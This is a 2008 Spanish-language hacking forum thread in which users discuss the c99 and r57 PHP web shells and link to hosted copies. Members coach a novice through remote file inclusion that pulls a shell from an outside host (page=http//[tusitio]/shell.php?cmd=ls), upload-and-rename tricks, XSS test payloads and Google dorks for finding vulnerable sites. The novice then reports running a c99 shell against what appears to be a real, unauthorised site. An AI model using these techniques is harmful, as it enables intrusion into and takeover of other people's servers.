Páginas: [1] 2 
|
 |
|
 Autor
|
Tema: c99.txt y r57.txt (Leído 1712 veces)
|
Achernar
 Desconectado
Mensajes: 321
|
quisiera saber si estas shells funcionan generalmente o si en realidad son como los troyanos conocidos que saltan el antivirus al mas minimo indicio. Gracias.
|
|
|
|
|
En línea
|
|
|
|
741852
Desconectado
Mensajes: 1.595
Central, Pont Aeri, Kontrol, Mansion, Masia...(L)
|
Sí que funcionan. Esas 2 son las mejores para mi parecer, las únicas que he probado realmente xd y sabes lo que es una shell? porque esa duda del troyano no me concuerda mucho *-) aquí la c99: http://usuarios.lycos.es/elitehacknet/C99Shell.txtno sé qué versión es como que van sacando que si privadas o no se qué.... y ya no practico nada de defacing ni esas cosas.... salu2! |
|
|
|
|
En línea
|
since 1992 there's a club wich is making history, seven years later in 1999 it's still kicking!, PONT AERI!
..... and in 2008 IT'S STILL KICKING !!!
pont aeri siempre
hardcore for life [H4L]
|
|
|
Achernar
Desconectado
Mensajes: 321
|
se que es una shell, lo del troyano es por lo rapido que un troyano pierde su utilidad cuando se hace conocido, y pensaba que con estas shells podria pasar lo mismo. alguien me podria decir porque esto funciona: php?url=www.google.com y esto no funciona php?url=usuarios.lycos.es/theripperm/shell/r57.txt este ultimo solo me muestra el contenido del txt y no me ejecuta ninguna shell, pude ser porque dice url, y quizas deberia decir page o file ? o algo asi?  |
|
|
|
|
En línea
|
|
|
|
741852
Desconectado
Mensajes: 1.595
Central, Pont Aeri, Kontrol, Mansion, Masia...(L)
|
porque dice url, y quizas deberia decir page o file ? o algo asi? eso no tiene nada que ver ¬¬ es la variable que llama a la página o archivo interno como si se llamara "caquita" xd por PM ya te dije añade un "?" al final porque si no lo lee como texto, a ver si te funciona, salu2! |
|
|
|
|
En línea
|
since 1992 there's a club wich is making history, seven years later in 1999 it's still kicking!, PONT AERI!
..... and in 2008 IT'S STILL KICKING !!!
pont aeri siempre
hardcore for life [H4L]
|
|
|
|
Azielito
|
Y seguro que es vulnerable? no es inclusion por iframes?  Suele pasar  checa si en lugar de hacer include con php sea con iframes, o frames |
|
|
|
|
En línea
|
|
|
|
741852
Desconectado
Mensajes: 1.595
Central, Pont Aeri, Kontrol, Mansion, Masia...(L)
|
ya, a lo mejor como dice Azielito no es vulnerable y simplemente abre la página de manera externa y no lo ejecuta en el propio servidor, ¿sabes?
salu2
pd , ya te digo prueba de poner "?" al final
|
|
|
|
|
En línea
|
since 1992 there's a club wich is making history, seven years later in 1999 it's still kicking!, PONT AERI!
..... and in 2008 IT'S STILL KICKING !!!
pont aeri siempre
hardcore for life [H4L]
|
|
|
Achernar
Desconectado
Mensajes: 321
|
mm todavia con el ? al final no funciona, seguro que no es vulnerable. Y seguro que es vulnerable? no es inclusion por iframes? Suele pasar checa si en lugar de hacer include con php sea con iframes, o frames como verifico esto? es que hace poco que estoy con esto y XSS y estoy bastante en bolas. me fijè en el codigo fuente de la pagina y creo que puede ser algo de lo que decis <html><head><title>www.google.com</title></head><frameset rows="100,*" frameborder="0" border="0" framespacing="0"><frame noresize="noresize" src="allc_header.php?url=www.google.com" scrolling=no marginwidth=0 marginheight=0> <frame src=http://www.google.com><noframes>Your browser does not support frames. allc.com uses frames to display results. You can view the <a href=http://www.google.com>referring page</a> </noframes></frameset></html> si es esto, como tendria que decir en el codigo fuente para saber que es vulnerable? o que es lo que tendria que detectar ademas de que abra google? ah y de verdad muchas gracias a los dos por darme una mano |
|
|
|
« Última modificación: 30 Mayo 2008, 22:43 por Achernar »
|
En línea
|
|
|
|
|
|
|
ulises2k
|
Hola vamos a aclarar algunas cosas.
Creo que a lo que le llamas troyano es a los tipicos troyanos de windows. Programas ejecutables.
Estas (c99 y r57) son shell web.
Estas 2 en este caso son aplicaciones php que te dan funcionales que la podriamos meter en la categoria de shell ya que podes correr comandos en el servidor donde esten corriendo, por lo general linux.
Como toda aplicacion web, esta corre con los permisos que corre el servidor web, que por lo general es apache o lighttpd.
Por esta ultima razon segun con que user corra el webserver, por lo general como "nobody", tienes muy poco permiso para "hacer cosas"
La shell por lo general cuando la quieras subir para comprometer un servidor, la renombras a .txt porque si en el server donde esta interpreta los .php, lo que obtenes cuando la quieras subir al servidor comprometido es la interpretacion del .php que es una pagina web y no el sourcecode el php, por eso al renombrar la shell a .txt no se interpreta, y subes al server comprometido todo el codigo .php
Luego que subiste la shell al server comprometido, renombras el .txt a .php e ingresas por http o https a la shell y obtendras una interface para "hacer cosas" en el server.
Instalate un Apache+php en una VM y probalas.
|
|
|
|
|
En línea
|
|
|
|
741852
Desconectado
Mensajes: 1.595
Central, Pont Aeri, Kontrol, Mansion, Masia...(L)
|
gracias por la clase sobre shells ulises xd
@Achernar dinos pues si es vulnerable a XSS a ver....
porque como bien dice azielito siendo frame se ejecuta en tu servidor y no en el víctima, o sea que la shell de ná sirve.
salu2
|
|
|
|
|
En línea
|
since 1992 there's a club wich is making history, seven years later in 1999 it's still kicking!, PONT AERI!
..... and in 2008 IT'S STILL KICKING !!!
pont aeri siempre
hardcore for life [H4L]
|
|
|
achernar_
Desconectado
Mensajes: 60
|
El script funciono bien, ahora las diferencias entre
><script>alert();</script>
y
<script>alert()</script> son porque hay que cerrar la llave abierta con el <frame src??? de modo que quedaria algo asi:
<frame src=><script>alert();</script><noframes>
no entiendo bien lo del ";" pero creo que voy bien, entonces si la pagina fuese verdaderamente vulnerable no tendria que mostrarme a google via frame src y entonces quizas el script para XSS no tendria que funcionar? estoy en lo correcto?
|
|
|
|
|
En línea
|
Tengo una habilidad sorprendente para hacer cosas que no sorprenden.
|
|
|
|
sirdarckcat
|
el ; es porque es javascript, y javascript usa sintaxis de C, que te pide un ; despues de cada instruccion, aunque podrias no ponersela y no pasa nada..
y si, si le mandas google como argumento te deberia mostrar google..
Saludos!!
|
|
|
|
|
En línea
|
|
|
|
achernar_
Desconectado
Mensajes: 60
|
en google estoy usando cosas como estas:
filetype:php inurl:url inurl:htm
pero no encuentro ninguno vulnerable para ver como es, siempre pasa lo mismo, creo que es lo de <iframe src=...
creo que en el codigo fuente tendria que haber un get? pude ser? hay alguna forma de buscar en google algo en el codigo fuente?
|
|
|
|
|
En línea
|
Tengo una habilidad sorprendente para hacer cosas que no sorprenden.
|
|
|
|
Azielito
|
deberia ser archivo.php=
url.php=
file.php= cosas similares |
|
|
|
|
En línea
|
|
|
|
achernar_
Desconectado
Mensajes: 60
|
bueno, segui con mi busqueda filetype:php inurl:page inurl:htm y despues miraba el codigo fuente buscando cosas como las que dijo Azielito y al final creo que encontre una web vulnerable, pero comparado con la shell que se ve aca http://www.youtube.com/watch?v=Zrp-HeeU4MEla que ejecute es parecida ( http://www.deyvill.org/c99.txt) con algunas cajas de texto pero con un gran desparramo de texto alrededor que parece codigo fuente... ¿que es eso? codigo que no se pudo ejecutar en el servidor? quise meter un simple ls y me salto una pagina de error y despues intente con un dir y paso lo mismo... alguien me puede explicar que es lo que vi? puede que estor errores al meter los comandos sean por el mismo motivo que hay codigo desparramado por toda la interfaz? suponiendo que tengo php?page=http://www.deyvill.org/c99.txtcomo tendria que hacer para ejecutar un comando desde la barra de direcciones, o sea, sin usar la shell? supongo que sera posible no? --------------------- Minutos despues ------------------------ encontre esto la sección de textos de elhacker.net Nota: solo van a correr estos comandos los servidores tengan el safe mode
en off.Entonces codeamos algo así: <?php $cmd=$_GET['cmd']; show_source($cmd); ?> Y lo subimos a nuestro Server, este seria explotado de esta manera: http://victima.com/pagvuln.php?page=http//[tusitio]/file-a-incluir Estas funciones permiten correr comandos en el sistema. Ya sabiendo usarlas podemos ponerle una extensión .gif y subirlas a nuestro webserver para incluirlas en la victima desde ahí. Se las renombra a .gif, ya que si las dejáramos en php se ejecutarían en nuestro server. Ejecutores de comandos Los ejecutores de comandos o "shells en php" son líneas de código que permiten ejecutar comandos más fácil, se usan así: http://victima.com/pagvuln.php?page=http//[tusitio]/shell.php?cmd=ls este ultimo renglon me genera una confusion, y es que dice shell. php?cmd=ls , no tendira que decir shell. gif?cmd=ls o cualquier otra extension que no sea php? yo subi un archivo php y uno gif a un servidor para ver esto y cuando uso el php me dice que el safe mode esta activado y me da unos path del servidor donde estan los archivos que yo subi (entonces creo que se ejecuta en mi servidor) y cuando uso el gif no me muestra nada, supongo que el servidor vulnerable no es tan vulnerable y tiene tambien el safe mode acrivado ¿puede ser este el motivo por el que la shell c99 no se ve bien? |
|
|
|
« Última modificación: 04 Junio 2008, 22:07 por achernar_ »
|
En línea
|
Tengo una habilidad sorprendente para hacer cosas que no sorprenden.
|
|
|
|
Páginas: [1] 2 
|
|
|
 |
